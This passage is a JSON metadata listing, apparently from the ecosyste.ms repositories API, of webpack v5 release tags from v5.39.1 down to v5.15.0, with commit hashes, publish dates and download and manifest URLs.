itHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db595